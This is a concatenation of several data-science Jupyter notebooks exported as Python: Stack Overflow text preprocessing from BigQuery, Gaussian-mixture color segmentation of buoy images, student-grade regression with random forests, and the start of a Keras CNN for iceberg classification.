for listtype in j5:
for genelist in j5[listtype]:
lname = listtypemap[listtype]
tempf = os.path.join(workdir, "{}_{}_{}".format(lname, sample_id, genelist))
print("Deleting temp file {}".format(tempf))
os.remove(tempf)
print("Deleting temp dir {}".format(workdir))
os.rmdir(workdir)
# + deletable=true editable=true
logging.info("Step 7: Done!")
print("Done!")
|
care/7_make-xls.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
#import the bq_helper library to help in making API calls to big query and fetch information
import bq_helper
from bq_helper import BigQueryHelper
import os
#we need to set the google application credentials key, which is unique based on the service account.
os.environ["GOOGLE_APPLICATION_CREDENTIALS"]="key.json"
bq_assistant = BigQueryHelper("bigquery-public-data", "stackoverflow")
#we find out the questions answered by a particular user and save them as a dataframe
QUERY = """
SELECT q.id, q.title, q.body, q.tags, a.body AS answers, a.score
FROM `bigquery-public-data.stackoverflow.posts_questions` AS q
INNER JOIN `bigquery-public-data.stackoverflow.posts_answers` AS a
  ON q.id = a.parent_id
WHERE q.tags LIKE '%python%'
LIMIT 500000
"""
df = bq_assistant.query_to_pandas(QUERY)
# -
#output this dataframe as a csv file
df.to_csv('data/Original_data.csv')
#read the stored csv file which has information as displayed below
import pandas as pd
import numpy as np
import spacy
EN = spacy.load('en_core_web_sm')
df = pd.read_csv('data/Original_data.csv')
df = df.iloc[:,1:]
df.head()
print('Database shape: ' + str(df.shape))
#we can see that there are no null values
df.isna().sum()
pd.__version__
# In order to construct a corpus, we grouped the answers by concatenating them under their common question and tags. We also summed the scores of the individual answers to obtain a collective score for each question
aggregations = {
'answers': lambda x: "\n".join(x) ,
'score': 'sum'
}
grouped = df.groupby(['id','title', 'body','tags'],as_index=False).agg(aggregations)
deduped_df = pd.DataFrame(grouped)
deduped_df.head()
# The following code block shows the result of combining answers and their scores
# +
print('Max score before: ')
print(np.max(df.score.values))
print('Max score after: ')
print(np.max(deduped_df.score.values))
# -
# A couple of helper functions for Text Preprocessing. The steps followed to process a piece of raw text are:
#
# 1. Convert raw text into tokens
# 2. Convert tokens to lower case
# 3. Remove punctuations
# 4. Remove Stopwords<br>
# Note: we skipped removal of numeric data since we felt it would discard useful contextual information. We also skipped a stemming/lemmatization step because we did not want to alter the domain-specific terms used in our corpus and risk losing information
# +
import re
import nltk
import inflect
from nltk.corpus import stopwords
from nltk.tokenize import RegexpTokenizer  # needed by tokenize_code below
def tokenize_text(text):
"Apply tokenization using spacy to docstrings."
tokens = EN.tokenizer(text)
return [token.text.lower() for token in tokens if not token.is_space]
def to_lowercase(words):
"""Convert all characters to lowercase from list of tokenized words"""
new_words = []
for word in words:
new_word = word.lower()
new_words.append(new_word)
return new_words
def remove_punctuation(words):
"""Remove punctuation from list of tokenized words"""
new_words = []
for word in words:
new_word = re.sub(r'[^\w\s]', '', word)
if new_word != '':
new_words.append(new_word)
return new_words
def remove_stopwords(words):
"""Remove stop words from list of tokenized words"""
new_words = []
for word in words:
if word not in stopwords.words('english'):
new_words.append(word)
return new_words
def normalize(words):
words = to_lowercase(words)
words = remove_punctuation(words)
words = remove_stopwords(words)
return words
def tokenize_code(text):
"A very basic procedure for tokenizing code strings."
return RegexpTokenizer(r'\w+').tokenize(text)
def preprocess_text(text):
return ' '.join(normalize(tokenize_text(text)))
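# The spaCy/NLTK pipeline above can be illustrated with a minimal, dependency-free stand-in (naive whitespace tokenizer and a tiny illustrative stopword list, both assumptions for the demo):

```python
import re

STOPWORDS = {"this", "is", "a", "the"}  # tiny illustrative list, not NLTK's


def preprocess_text_demo(text):
    """Tokenize -> lowercase -> strip punctuation -> drop stopwords."""
    tokens = text.split()                                  # naive tokenizer
    tokens = [t.lower() for t in tokens]                   # lowercase
    tokens = [re.sub(r"[^\w\s]", "", t) for t in tokens]   # drop punctuation
    tokens = [t for t in tokens if t and t not in STOPWORDS]
    return " ".join(tokens)


print(preprocess_text_demo("This is a Test, really!"))  # -> test really
```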
# +
from bs4 import BeautifulSoup
from textblob import TextBlob
title_list = []
content_list = []
url_list = []
comment_list = []
sentiment_polarity_list = []
sentiment_subjectivity_list = []
vote_list =[]
tag_list = []
corpus_list = []
for i, row in deduped_df.iterrows():
title_list.append(row.title) # Get question title
tag_list.append(row.tags) # Get question tags
# Questions
content = row.body
soup = BeautifulSoup(content, 'lxml')
if soup.code: soup.code.decompose() # Remove the code section
tag_p = soup.p
tag_pre = soup.pre
text = ''
if tag_p: text = text + tag_p.get_text()
if tag_pre: text = text + tag_pre.get_text()
content_list.append(str(row.title) + ' ' + str(text)) # Append title and question body data to the updated question body
url_list.append('https://stackoverflow.com/questions/' + str(row.id))
# Answers
content = row.answers
soup = BeautifulSoup(content, 'lxml')
if soup.code: soup.code.decompose()
tag_p = soup.p
tag_pre = soup.pre
text = ''
if tag_p: text = text + tag_p.get_text()
if tag_pre: text = text + tag_pre.get_text()
comment_list.append(text)
vote_list.append(row.score) # Append votes
corpus_list.append(content_list[-1] + ' ' + comment_list[-1]) # Combine the updated body and answers to make the corpus
sentiment = TextBlob(row.answers).sentiment
sentiment_polarity_list.append(sentiment.polarity)
sentiment_subjectivity_list.append(sentiment.subjectivity)
content_token_df = pd.DataFrame({
    'original_title': title_list,
    'post_corpus': corpus_list,
    'question_content': content_list,
    'question_url': url_list,
    'tags': tag_list,
    'overall_scores': vote_list,
    'answers_content': comment_list,
    'sentiment_polarity': sentiment_polarity_list,
    'sentiment_subjectivity': sentiment_subjectivity_list})
# -
content_token_df.head()
# +
content_token_df.tags = content_token_df.tags.apply(lambda x: x.split('|')) # Convert raw text data of tags into lists
# Make a dictionary to count the frequencies for all tags
tag_freq_dict = {}
for tags in content_token_df.tags:
for tag in tags:
        if tag not in tag_freq_dict:
            tag_freq_dict[tag] = 1  # count the first occurrence too
        else:
            tag_freq_dict[tag] += 1
# -
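# The frequency-counting loop above can also be written in one pass with `collections.Counter`; the sample tag lists here are hypothetical:

```python
from collections import Counter

# Hypothetical sample of the per-question tag lists built above.
tag_lists = [["python", "pandas"], ["python", "numpy"], ["python", "pandas"]]

# Counter sums frequencies across all lists and counts first occurrences correctly.
tag_freq = Counter(tag for tags in tag_lists for tag in tags)
print(tag_freq.most_common(2))  # -> [('python', 3), ('pandas', 2)]
```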
# The plan is to keep only the questions whose tags include at least one of most_common_tags besides 'python'
import heapq
most_common_tags = heapq.nlargest(20, tag_freq_dict, key=tag_freq_dict.get)
most_common_tags
final_indices = []
for i,tags in enumerate(content_token_df.tags.values.tolist()):
if len(set(tags).intersection(set(most_common_tags)))>1: # The minimum length for common tags should be 2 because 'python' is a common tag for all
final_indices.append(i)
final_data = content_token_df.iloc[final_indices]
# **Data Normalization**
# <br>
# 1. We created a separate 'processed_title' column so that the original titles are preserved for serving in the web interface
# 2. We also normalized the numeric 'scores'
# +
import spacy
EN = spacy.load('en_core_web_sm')
# Preprocess text for 'question_body', 'post_corpus' and a new column 'processed_title'
final_data.question_content = final_data.question_content.apply(lambda x: preprocess_text(x))
final_data.post_corpus = final_data.post_corpus.apply(lambda x: preprocess_text(x))
final_data['processed_title'] = final_data.original_title.apply(lambda x: preprocess_text(x))
# Normalize numeric data for the scores
final_data.overall_scores = (final_data.overall_scores - final_data.overall_scores.mean()) / (final_data.overall_scores.max() - final_data.overall_scores.min())
# -
final_data.tags = final_data.tags.apply(lambda x: '|'.join(x)) # Combine the lists back into text data
final_data = final_data.drop(['answers_content'], axis=1) # Remove the answers_content column because it is already included in the corpus
|
preprocessing/preprocess_tags.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import cv2
import numpy as np
from matplotlib import pyplot as plt
import os
import math
import random
# +
images=[]
path = "/Data/Yellow/"
path=os.getcwd()+path
for image in os.listdir(path):
images.append(image)
random.seed(0)
random.shuffle(images)
l=len(images)
test_images=images[0:int(l*0.3)]
images=images[int(l*0.3):]
# -
im=cv2.imread("%s%s"%(path,'yellow58.jpg'))
plt.imshow(cv2.cvtColor(im,cv2.COLOR_BGR2RGB))
# ## AVG HISTOGRAM
# +
histb=np.zeros((256,1))
histg=np.zeros((256,1))
histr=np.zeros((256,1))
for image in images:
image = cv2.imread("%s%s"%(path,image))
b,g,r=cv2.split(image)
bv=np.ravel(b)
rv=np.ravel(r)
gv=np.ravel(g)
for i,col in enumerate(gv):
if(not(col>220 and bv[i]>220 and rv[i]>240)):
histg[col]+=1
histb[bv[i]]+=1
histr[rv[i]]+=1
histg=histg/len(images)
histr=histr/len(images)
histb=histb/len(images)
# -
plt.plot(histb,color = 'b')
plt.plot(histg,color = 'g')
plt.plot(histr,color = 'r')
plt.show()
# +
pixelb=[]
pixelg=[]
pixelr=[]
for image in images:
image = cv2.imread("%s%s"%(path,image))
b,g,r=cv2.split(image)
for i in range (b.shape[0]):
for j in range(b.shape[1]):
k=image[i,j]
if(not(k[0]>220 and k[2]>240 and k[1]>240)):
pixelb.append(b[i,j])
pixelg.append(g[i,j])
pixelr.append(r[i,j])
pb=np.array(pixelb)
pg=np.array(pixelg)
pr=np.array(pixelr)
# -
# ## GREEN CHANNEL
# +
n = 0
mean1 = 200
mean2 = 150
# mean3 = 230
std1 = 6
std2 = 6
# std3 = 10
# -
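# The EM loops below call a `Probabilty` helper that is never defined in this chunk. A minimal sketch, assuming it is the Gaussian pdf consistent with the `gaussian` function defined later in this notebook:

```python
import numpy as np


def Probabilty(x, mean, std):
    """Gaussian pdf evaluated element-wise over the pixel array x.

    Mirrors the `gaussian` helper in the plotting section; the exact
    original implementation is not shown in this chunk.
    """
    return (1.0 / (std * np.sqrt(2 * np.pi))) * np.exp(
        -np.square(x - mean) / (2 * std ** 2))
```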
while (n != 50):
p1 = Probabilty(pg,mean1,std1)
p2 = Probabilty(pg, mean2, std2)
# p3 = Probabilty(pg, mean3, std3)
D=p1+ p2
b1=p1/D
b2=p2/D
# b3=p3/D
mean1=np.sum(b1*pg)/(np.sum(b1))
mean2=np.sum(b2*pg)/(np.sum(b2))
# mean3=np.sum(b3*pg)/(np.sum(b3))
std1=np.sqrt(np.sum(b1*np.square(pg-mean1))/np.sum(b1))
std2=np.sqrt(np.sum(b2*np.square(pg-mean2))/np.sum(b2))
# std3=np.sqrt(np.sum(b3*np.square(pg-mean3))/np.sum(b3))
n = n + 1
# +
meang1=mean1
meang2=mean2
# meang3=mean3
stdg1=std1
stdg2=std2
# stdg3=std3
print('final mean- ',mean1,mean2)
print('final strd- ',std1, std2)
# -
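# The loop above is one run of expectation-maximization for a two-component, equal-weight 1-D Gaussian mixture. A compact standalone version of the same updates, checked on synthetic data (all names and parameters here are illustrative):

```python
import numpy as np


def em_two_gaussians(x, m1, m2, s1, s2, iters=50):
    """Plain 1-D two-component EM with equal mixing weights,
    mirroring the update equations in the channel loops."""
    for _ in range(iters):
        # E-step: component densities and responsibilities
        p1 = np.exp(-((x - m1) ** 2) / (2 * s1 ** 2)) / (s1 * np.sqrt(2 * np.pi))
        p2 = np.exp(-((x - m2) ** 2) / (2 * s2 ** 2)) / (s2 * np.sqrt(2 * np.pi))
        r1 = p1 / (p1 + p2)
        r2 = 1.0 - r1
        # M-step: responsibility-weighted means and standard deviations
        m1 = np.sum(r1 * x) / np.sum(r1)
        m2 = np.sum(r2 * x) / np.sum(r2)
        s1 = np.sqrt(np.sum(r1 * (x - m1) ** 2) / np.sum(r1))
        s2 = np.sqrt(np.sum(r2 * (x - m2) ** 2) / np.sum(r2))
    return m1, m2, s1, s2


rng = np.random.default_rng(0)
x = np.concatenate([rng.normal(150, 6, 500), rng.normal(200, 6, 500)])
m1, m2, s1, s2 = em_two_gaussians(x, 140, 210, 10, 10)
```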
# ## RED CHANNEL
# +
n = 0
mean1 = 250
mean2 = 200
# mean3 = 190
std1 = 7
std2 = 7
# std3 = 10
# -
while (n != 50):
p1 = Probabilty(pr,mean1,std1)
p2 = Probabilty(pr, mean2, std2)
# p3 = Probabilty(pr, mean3, std3)
D=p1+ p2
b1=p1/D
b2=p2/D
# b3=p3/D
mean1=np.sum(b1*pr)/(np.sum(b1))
mean2=np.sum(b2*pr)/(np.sum(b2))
# mean3=np.sum(b3*pr)/(np.sum(b3))
std1=np.sqrt(np.sum(b1*np.square(pr-mean1))/np.sum(b1))
std2=np.sqrt(np.sum(b2*np.square(pr-mean2))/np.sum(b2))
# std3=np.sqrt(np.sum(b3*np.square(pr-mean3))/np.sum(b3))
n = n + 1
meanr1=mean1
meanr2=mean2
# meanr3=mean3
stdr1=std1
stdr2=std2
# stdr3=std3
print('final mean- ',mean1,mean2)
print('final strd- ',std1, std2)
# ## BLUE CHANNEL
# +
n = 0
mean1 = 120
mean2 = 150
# mean3 = 150
std1 = 10
std2 = 10
# std3 = 10
# -
while (n != 50):
p1 = Probabilty(pb,mean1,std1)
p2 = Probabilty(pb, mean2, std2)
# p3 = Probabilty(pb, mean3, std3)
D=p1+ p2
b1=p1/D
b2=p2/D
# b3=p3/D
mean1=np.sum(b1*pb)/(np.sum(b1))
mean2=np.sum(b2*pb)/(np.sum(b2))
# mean3=np.sum(b3*pb)/(np.sum(b3))
std1=np.sqrt(np.sum(b1*np.square(pb-mean1))/np.sum(b1))
std2=np.sqrt(np.sum(b2*np.square(pb-mean2))/np.sum(b2))
# std3=np.sqrt(np.sum(b3*np.square(pb-mean3))/np.sum(b3))
n = n + 1
meanb1=mean1
meanb2=mean2
# meanb3=mean3
stdb1=std1
stdb2=std2
# stdb3=std3
print('final mean- ',mean1,mean2)
print('final strd- ',std1, std2)
# ## GAUSSIAN PLOT
# +
def gaussian(x, mu, sig):
return ((1/(sig*math.sqrt(2*math.pi)))*np.exp(-np.power(x - mu, 2.) / (2 * np.power(sig, 2.))))
x=list(range(0, 256))
mg1=np.array([meang1])
mg2=np.array([meang2])
# mg3=np.array([meang3])
sg1=np.array([stdg1])
sg2=np.array([stdg2])
# sg3=np.array([stdg3])
g1=gaussian(x, mg1, sg1)
g2=gaussian(x, mg2, sg2)
# g3=gaussian(x, mg3, sg3)
plt.plot(g1, 'g', linestyle='-')
plt.plot(g2, 'g', linestyle='--')
# plt.plot(g3, 'g', linestyle=':')
mr1=np.array([meanr1])
mr2=np.array([meanr2])
# mr3=np.array([meanr3])
sr1=np.array([stdr1])
sr2=np.array([stdr2])
# sr3=np.array([stdr3])
r1=gaussian(x, mr1, sr1)
r2=gaussian(x, mr2, sr2)
# r3=gaussian(x, mr3, sr3)
mb1=np.array([meanb1])
mb2=np.array([meanb2])
# mb3=np.array([meanb3])
sb1=np.array([stdb1])
sb2=np.array([stdb2])
# sb3=np.array([stdb3])
b1=gaussian(x, mb1, sb1)
b2=gaussian(x, mb2, sb2)
# b3=gaussian(x, mb3, sb3)
plt.plot(b1, 'b', linestyle='-')
plt.plot(b2, 'b', linestyle='--')
# plt.plot(b3, 'b', linestyle=':')
print(max(b1))
print(max(b2))
# print(max(b3))
print(max(g1))
print(max(g2))
# print(max(g3))
print(max(r1))
print(max(r2))
# print(max(r3))
plt.plot(r1, 'r',linestyle='-')
plt.plot(r2, 'r',linestyle='--')
# plt.plot(r3, 'r',linestyle=':')
plt.show()
# -
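As a sanity check on the `gaussian` helper defined above (restated here so the cell runs standalone), a proper density should sum to roughly one when accumulated over a fine grid that covers the curve:

```python
import math
import numpy as np

def gaussian(x, mu, sig):
    # same density as in the plotting cell above
    return ((1 / (sig * math.sqrt(2 * math.pi)))
            * np.exp(-np.power(x - mu, 2.) / (2 * np.power(sig, 2.))))

xs = np.linspace(0.0, 255.0, 2551)                 # 0.1-wide steps over the 8-bit range
area = gaussian(xs, 128.0, 7.0).sum() * (xs[1] - xs[0])
print(round(area, 4))   # 1.0 when the curve fits well inside [0, 255]
```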
# ## TRIAL IMAGE SEGMENTATION
image=cv2.imread('frame.png')
plt.imshow(cv2.cvtColor(image,cv2.COLOR_BGR2RGB))
# +
print(max(b1))
print(max(b2))
# print(max(b3))
print(max(g1))
print(max(g2))
# print(max(g3))
print(max(r1))
print(max(r2))
# +
# image_g=image[:,:,1]
# image_r=image[:,:,2]
# image_b=image[:,:,0]
b,g,r=cv2.split(image)
img_out3=np.zeros(g.shape, dtype = np.uint8)
for index, v in np.ndenumerate(r):
    x = b[index]
    y = g[index]
    # v, x, y are the red, blue, and green pixel values at this location;
    # test each value against its own channel's fitted Gaussian curves
    if (g1[y] > 0.015 or g2[y] > 0.016) and (b2[x] > 0.016 or b1[x] > 0.015) and (r2[v] > 0.016 or r1[v] > 0.015):
        img_out3[index] = 255
    else:
        img_out3[index] = 0
# -
plt.imshow(img_out3)
# +
ret, threshold3 = cv2.threshold(img_out3, 240, 255, cv2.THRESH_BINARY)
kernel3 = np.ones((2,2),np.uint8)
dilation3 = cv2.dilate(threshold3,kernel3,iterations =6)
contours3, _= cv2.findContours(dilation3, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
for contour in contours3:
if cv2.contourArea(contour) > 20:
(x,y),radius = cv2.minEnclosingCircle(contour)
center = (int(x),int(y))
radius = int(radius)
# print(radius)
if radius > 13:
print(radius)
cv2.circle(image,center,radius,(0,0,255),2)
# -
plt.imshow(cv2.cvtColor(image,cv2.COLOR_BGR2RGB))
|
Code/GMM Estimation Notebook/yellowEstimate.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
df_mat = pd.read_csv("student-mat.csv", sep=";")
df_por = pd.read_csv("student-por.csv", sep=";")
df_mat.head()
# -
# !ls
df_mat.columns
df_mat.shape
y = df_mat["G3"]
X = df_mat.drop(labels=["G1", "G2", "G3"], axis=1)
sns.pairplot(df_mat.drop(labels=["G1", 'failures', 'schoolsup', 'famsup', 'paid', 'activities', 'nursery',
'higher', 'internet', 'romantic', 'famrel', 'freetime', 'goout', 'Dalc', "G2"], axis=1))
sns.pairplot(df_mat.drop(labels=['school', 'sex', 'age', 'address', 'famsize', 'Pstatus', 'Medu', 'Fedu',
'Mjob', 'Fjob', 'reason', 'guardian', 'traveltime', 'studytime', "G1", "G2"], axis=1))
# # Pairplot
#
# - All discretes variables
# - Grade seems "normally distributed"
# - No so much data
# - Need encoding of text values
from sklearn.preprocessing import OneHotEncoder
enc = OneHotEncoder(handle_unknown='ignore')
enc.fit(X).categories_
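What `OneHotEncoder` does can be illustrated with plain numpy on a hypothetical toy column (not the student data):

```python
import numpy as np

school = np.array(["GP", "MS", "GP", "GP"])             # toy categorical column
levels, codes = np.unique(school, return_inverse=True)  # category -> integer code
one_hot = np.eye(len(levels))[codes]                    # one indicator row per sample
print(levels)     # ['GP' 'MS']
print(one_hot)
```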
correlations = df_mat.corr(method='pearson')
print(correlations)
sns.heatmap(correlations)
X
# +
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder, LabelEncoder
from sklearn.metrics import r2_score
from sklearn.model_selection import train_test_split as tts
def score_model(X, y, estimator, **kwargs):
"""
Test various estimators.
"""
#y = LabelEncoder().fit_transform(y)
model = Pipeline([
('one_hot_encoder', OneHotEncoder()),
('estimator', estimator)
])
# Instantiate the classification model and visualizer
model.fit(X, y, **kwargs)
expected = y
predicted = model.predict(X)
# Compute and return F1 (harmonic mean of precision and recall)
print("{}: {}".format(estimator.__class__.__name__, r2_score(expected, predicted)))
models = [
RandomForestRegressor(n_estimators=100)
]
for model in models:
score_model(X, y, model)
# -
# Nice overfit
# +
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder, LabelEncoder
from sklearn.metrics import r2_score
from sklearn.model_selection import train_test_split as tts
from yellowbrick.regressor import ResidualsPlot
from sklearn.ensemble import RandomForestRegressor
def score_model(X, y, estimator, **kwargs):
"""
Test various estimators.
"""
#y = LabelEncoder().fit_transform(y)
model = Pipeline([
('one_hot_encoder', OneHotEncoder()),
('estimator', estimator)
])
# Instantiate the classification model and visualizer
visualizer = ResidualsPlot(
model
)
X_train, X_test, y_train, y_test = tts(X, y, test_size=0.10)
visualizer.fit(X_train, y_train)
visualizer.score(X_test, y_test)
visualizer.show()
# Compute and return F1 (harmonic mean of precision and recall)
#print("{}: {}".format(estimator.__class__.__name__, r2_score(expected, predicted)))
models = [
RandomForestRegressor(n_estimators=100, ccp_alpha = 0.1)
]
for model in models:
score_model(X, y, model)
# -
# about 500 grades
#
# about 30 features
#
# > overfitting
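The overfitting noted above is exactly what scoring on the training set hides; a numpy-only illustration with a 1-nearest-neighbour regressor on a pure-noise target (synthetic data, not the student set) shows a perfect in-sample R² next to a useless held-out one:

```python
import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(40, 5))
y = rng.normal(size=40)                    # target is pure noise

def knn1_predict(X_train, y_train, X_query):
    # 1-nearest-neighbour regression: copy the label of the closest training row
    d = ((X_query[:, None, :] - X_train[None, :, :]) ** 2).sum(-1)
    return y_train[d.argmin(axis=1)]

def r2(y_true, y_pred):
    return 1 - ((y_true - y_pred) ** 2).sum() / ((y_true - y_true.mean()) ** 2).sum()

train_r2 = r2(y[:30], knn1_predict(X[:30], y[:30], X[:30]))   # memorises -> 1.0
test_r2 = r2(y[30:], knn1_predict(X[:30], y[:30], X[30:]))    # noise target -> poor
print(train_r2, round(test_r2, 2))
```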
# +
ccp_alphas = [1, 10, 5, 0.5, 0.1, 1]
for ccp_alpha in ccp_alphas:
models = [
RandomForestRegressor(n_estimators=100, ccp_alpha = ccp_alpha)
]
for model in models:
print("cc alpha {} ".format(ccp_alpha))
score_model(X, y, model)
# -
|
ADS-Summer2020_Cohort 18/student/education.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # CNN_10channel
#
# Abstract:
# - single channel: band_avg
# - CNN, small net
#
# Result:
# - Kaggle score:
#
# References:
# - https://www.kaggle.com/ivalmian/simple-svd-xgboost-baseline-lb-35
# - https://www.kaggle.com/arieltci/a-keras-prototype-0-21174-on-pl
# ## 1. Preprocess
# ### Import pkgs
# +
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import log_loss, accuracy_score
from IPython.display import display
# %matplotlib inline
# -
import os
import time
import zipfile
import lzma
import pickle
from PIL import Image
from shutil import copy2
# ### Run name
project_name = 'SC_Iceberg_Classifier'
step_name = 'CNN_4channel'
date_str = time.strftime("%Y%m%d", time.localtime())
time_str = time.strftime("%Y%m%d_%H%M%S", time.localtime())
run_name = project_name + '_' + step_name + '_' + time_str
print('run_name: ' + run_name)
# ### Basic folders
cwd = os.getcwd()
input_path = os.path.join(cwd, 'input')
log_path = os.path.join(cwd, 'log')
model_path = os.path.join(cwd, 'model')
output_path = os.path.join(cwd, 'output')
print('input_path: ' + input_path)
print('log_path: ' + log_path)
print('model_path: ' + model_path)
print('output_path: ' + output_path)
# ### Load data
sample_submission_path = os.path.join(input_path, 'sample_submission.csv')
sample_submission = pd.read_csv(sample_submission_path)
print(sample_submission.shape)
sample_submission.head(2)
# +
is_iceberg_path = os.path.join(input_path, 'is_iceberg.p')
y_data = pickle.load(open(is_iceberg_path, mode='rb'))
print(y_data.shape)
# +
# %%time
#Load original data
inc_angle_data_path = os.path.join(input_path, 'inc_angle_data.p')
inc_angle_test_path = os.path.join(input_path, 'inc_angle_test.p')
inc_angle_data = pickle.load(open(inc_angle_data_path, mode='rb'))
inc_angle_test = pickle.load(open(inc_angle_test_path, mode='rb'))
print(inc_angle_data.shape)
print(inc_angle_test.shape)
# +
# %%time
#Load original data
band1_data_path = os.path.join(input_path, 'band1_data.p')
band2_data_path = os.path.join(input_path, 'band2_data.p')
band_avg_data_path = os.path.join(input_path, 'band_avg_data.p')
band1_test_path = os.path.join(input_path, 'band1_test.p')
band2_test_path = os.path.join(input_path, 'band2_test.p')
band_avg_test_path = os.path.join(input_path, 'band_avg_test.p')
band1_data = pickle.load(open(band1_data_path, mode='rb'))
band2_data = pickle.load(open(band2_data_path, mode='rb'))
band_avg_data = pickle.load(open(band_avg_data_path, mode='rb'))
band1_test = pickle.load(open(band1_test_path, mode='rb'))
band2_test = pickle.load(open(band2_test_path, mode='rb'))
band_avg_test = pickle.load(open(band_avg_test_path, mode='rb'))
print(band1_data.shape)
print(band2_data.shape)
print(band_avg_data.shape)
print(band1_test.shape)
print(band2_test.shape)
print(band_avg_test.shape)
# +
# %%time
#Load original data
band1_data_edges_path = os.path.join(input_path, 'band1_data_edges.p')
band2_data_edges_path = os.path.join(input_path, 'band2_data_edges.p')
band_avg_data_edges_path = os.path.join(input_path, 'band_avg_data_edges.p')
band1_test_edges_path = os.path.join(input_path, 'band1_test_edges.p')
band2_test_edges_path = os.path.join(input_path, 'band2_test_edges.p')
band_avg_test_edges_path = os.path.join(input_path, 'band_avg_test_edges.p')
band1_data_edges = pickle.load(open(band1_data_edges_path, mode='rb'))
band2_data_edges = pickle.load(open(band2_data_edges_path, mode='rb'))
band_avg_data_edges = pickle.load(open(band_avg_data_edges_path, mode='rb'))
band1_test_edges = pickle.load(open(band1_test_edges_path, mode='rb'))
band2_test_edges = pickle.load(open(band2_test_edges_path, mode='rb'))
band_avg_test_edges = pickle.load(open(band_avg_test_edges_path, mode='rb'))
print(band1_data_edges.shape)
print(band2_data_edges.shape)
print(band_avg_data_edges.shape)
print(band1_test_edges.shape)
print(band2_test_edges.shape)
print(band_avg_test_edges.shape)
# +
# %%time
#Load original data
band1_data_gabor_path = os.path.join(input_path, 'band1_data_gabor.p')
band2_data_gabor_path = os.path.join(input_path, 'band2_data_gabor.p')
band_avg_data_gabor_path = os.path.join(input_path, 'band_avg_data_gabor.p')
band1_test_gabor_path = os.path.join(input_path, 'band1_test_gabor.p')
band2_test_gabor_path = os.path.join(input_path, 'band2_test_gabor.p')
band_avg_test_gabor_path = os.path.join(input_path, 'band_avg_test_gabor.p')
band1_data_gabor = pickle.load(open(band1_data_gabor_path, mode='rb'))
band2_data_gabor = pickle.load(open(band2_data_gabor_path, mode='rb'))
band_avg_data_gabor = pickle.load(open(band_avg_data_gabor_path, mode='rb'))
band1_test_gabor = pickle.load(open(band1_test_gabor_path, mode='rb'))
band2_test_gabor = pickle.load(open(band2_test_gabor_path, mode='rb'))
band_avg_test_gabor = pickle.load(open(band_avg_test_gabor_path, mode='rb'))
print(band1_data_gabor.shape)
print(band2_data_gabor.shape)
print(band_avg_data_gabor.shape)
print(band1_test_gabor.shape)
print(band2_test_gabor.shape)
print(band_avg_test_gabor.shape)
# -
# %%time
x_data = np.concatenate([band1_data[:, :, :, np.newaxis],
band2_data[:, :, :, np.newaxis],
band_avg_data[:, :, :, np.newaxis]], axis=-1)
print(x_data.shape)
x_test = np.concatenate([band1_test[:, :, :, np.newaxis],
band2_test[:, :, :, np.newaxis],
band_avg_test[:, :, :, np.newaxis],], axis=-1)
print(x_test.shape)
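The concatenation above stacks three single-band (N, 75, 75) arrays into one channels-last (N, 75, 75, 3) tensor via `np.newaxis`; a toy shape check:

```python
import numpy as np

band1 = np.zeros((4, 75, 75))
band2 = np.ones((4, 75, 75))
band_avg = (band1 + band2) / 2
stacked = np.concatenate([band1[:, :, :, np.newaxis],
                          band2[:, :, :, np.newaxis],
                          band_avg[:, :, :, np.newaxis]], axis=-1)
print(stacked.shape)       # (4, 75, 75, 3)
print(stacked[0, 0, 0])    # [0.  1.  0.5]
```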
# +
# # %%time
# x_data = np.concatenate([band1_data[:, :, :, np.newaxis],
# band2_data[:, :, :, np.newaxis],
# band_avg_data[:, :, :, np.newaxis],
# band1_data_edges[:, :, :, np.newaxis],
# band2_data_edges[:, :, :, np.newaxis],
# band_avg_data_edges[:, :, :, np.newaxis],
# band1_data_gabor[:, :, :, np.newaxis],
# band2_data_gabor[:, :, :, np.newaxis],
# band_avg_data_gabor[:, :, :, np.newaxis]], axis=-1)
# print(x_data.shape)
# x_test = np.concatenate([band1_test[:, :, :, np.newaxis],
# band2_test[:, :, :, np.newaxis],
# band_avg_test[:, :, :, np.newaxis],
# band1_test_edges[:, :, :, np.newaxis],
# band2_test_edges[:, :, :, np.newaxis],
# band_avg_test_edges[:, :, :, np.newaxis],
# band1_test_gabor[:, :, :, np.newaxis],
# band2_test_gabor[:, :, :, np.newaxis],
# band_avg_test_gabor[:, :, :, np.newaxis]], axis=-1)
# print(x_test.shape)
# -
# %%time
x_train, x_val, inc_angle_train, inc_angle_val, y_train, y_val = train_test_split(x_data, inc_angle_data, y_data, test_size=0.15, shuffle=True, random_state=31)
print(x_train.shape)
print(x_val.shape)
print(inc_angle_train.shape)
print(inc_angle_val.shape)
print(y_train.shape)
print(y_val.shape)
# ## 2. Build model
from keras.utils.np_utils import to_categorical # convert to one-hot-encoding
from keras.models import Sequential, Model
from keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D, GlobalMaxPooling2D, BatchNormalization, Input
from keras.layers.merge import Concatenate
from keras.optimizers import Adam
from keras.preprocessing.image import ImageDataGenerator
from keras.callbacks import LearningRateScheduler, TensorBoard
def build_model():
model = Sequential()
model.add(Conv2D(filters = 64, kernel_size = (3, 3), activation='relu',
input_shape = (75, 75, 3)))
model.add(BatchNormalization())
model.add(Conv2D(filters = 64, kernel_size = (3, 3), activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(strides=(2,2)))
